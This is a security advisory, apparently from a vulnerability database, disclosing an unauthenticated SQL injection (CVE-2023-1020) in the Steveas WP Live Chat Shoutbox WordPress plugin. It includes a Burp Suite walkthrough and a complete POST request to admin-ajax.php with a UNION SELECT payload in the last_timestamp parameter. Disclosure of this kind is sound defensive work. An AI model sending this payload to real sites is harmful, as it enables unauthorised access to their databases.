Lucene search
Simone Onofri, Donato OnofriWPEX-ID:4E5AA9A3-65A0-47D6-BC26-A2FB6CB073FFHistoryApr 03, 2023 - 12:00 a.m.
Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi
2023-04-0300:00:00
Simone Onofri, Donato Onofri
57
unauthenticated sql injection
intercept request
burp suite
exploit
security document
0.053 Low
EPSS
Percentile
93.1%
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Submit a message in the chatbox, intercept the request using Burp Suite for example.
Edit the request to reflect this request: action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
Send the Request, and it will succeed and also lists previous messages.
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Shoutbox_alias=Guest_209
Connection: close
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=defaultRelated
prion
prion
Sql injection
2023-04-24 19:15:00
nuclei
nuclei
Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
2023-05-06 12:12:20
nvd
nvd
CVE-2023-1020
2023-04-24 19:15:09
wpvulndb
wpvulndb
Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi
2023-04-03 00:00:00
cve
cve
CVE-2023-1020
2023-04-24 19:15:09
cvelist
cvelist
CVE-2023-1020 Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi
2023-04-24 18:30:51
wordfence
wordfence